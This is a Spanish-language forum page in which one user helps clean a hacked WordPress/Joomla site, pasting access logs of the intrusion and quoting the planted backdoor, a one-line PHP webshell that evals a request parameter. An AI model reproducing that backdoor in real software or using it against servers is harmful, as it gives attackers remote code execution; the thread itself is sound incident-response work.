elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 [390] 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 ... 769
3891  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 05:06 am
Citar
Debo comentarlas como has hecho tu o lo estás modificando vos?

He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD

Citar
Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...

Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.

PD: @MinusFour, si quieres te paso el access-log ?

Saludos
3892  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 05:00 am
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos
3893  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:50 am
Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
  1. <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos
3894  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:44 am
En el archivo litermalmente pone esto:

Código:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..

Saludos
3895  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:40 am
Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.

Lo que si he podido aislar es el ataque..

Código:
176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"

El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.

Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD

Estoy mirando el archivo ese de joomla.

Saludos
3896  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 04:01 am
Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa...


Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento.

Ahora toca mirar la vulnerabilidad esa..

Saludos
3897  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 03:50 am
He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto:

Código:
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] The Zend Engine API version 220090626 which is installed, is newer.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Contact Zend Technologies at http://www.zend.com/ for a later version of Zend Optimizer.

Raro xD

Saludos
3898  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 03:38 am
Ya lo mire no tiene ninguno.  Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona.

Saludos
3899  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 03:30 am
EY ! Estoy aquí xDD estoy buscando al culpable del error 500.. Mientras tanto..

Encontre al culpable del juankeo..
http://paste.debian.net/plain/111546 Es posible que tengas una vulnerabilidad en
Código:
http://wilboradalibros.com.ar/peritajedearte/

Saludos
3900  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 03:04 am
@MinusFour busque red.php pero no encontre nada en el access...

Lo que si he visto, unas cuantas entradas de IP's que se aprovecharon del mailer (wp-query.php)

Código:
213.229.124.7 - - [08/Jul/2014:19:53:12 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
85.17.31.91 - - [08/Jul/2014:20:37:26 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
85.17.31.91 - - [08/Jul/2014:21:25:08 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
85.17.31.91 - - [08/Jul/2014:22:14:55 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 532 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:09:53:17 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 399 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:13:35:23 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 156 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
85.17.31.91 - - [09/Jul/2014:13:51:12 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 153 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:14:22:21 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:20:31:49 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:21:40:58 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 509 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [09/Jul/2014:22:24:31 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 519 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [10/Jul/2014:14:28:06 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [10/Jul/2014:15:21:29 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [10/Jul/2014:15:49:22 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [10/Jul/2014:16:36:37 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
213.229.124.7 - - [10/Jul/2014:16:39:59 -0300] "POST /wp-content/themes/wilborada/wp-query.php HTTP/1.1" 200 132 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0

Saludos
Páginas: 1 ... 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 [390] 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 ... 769
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines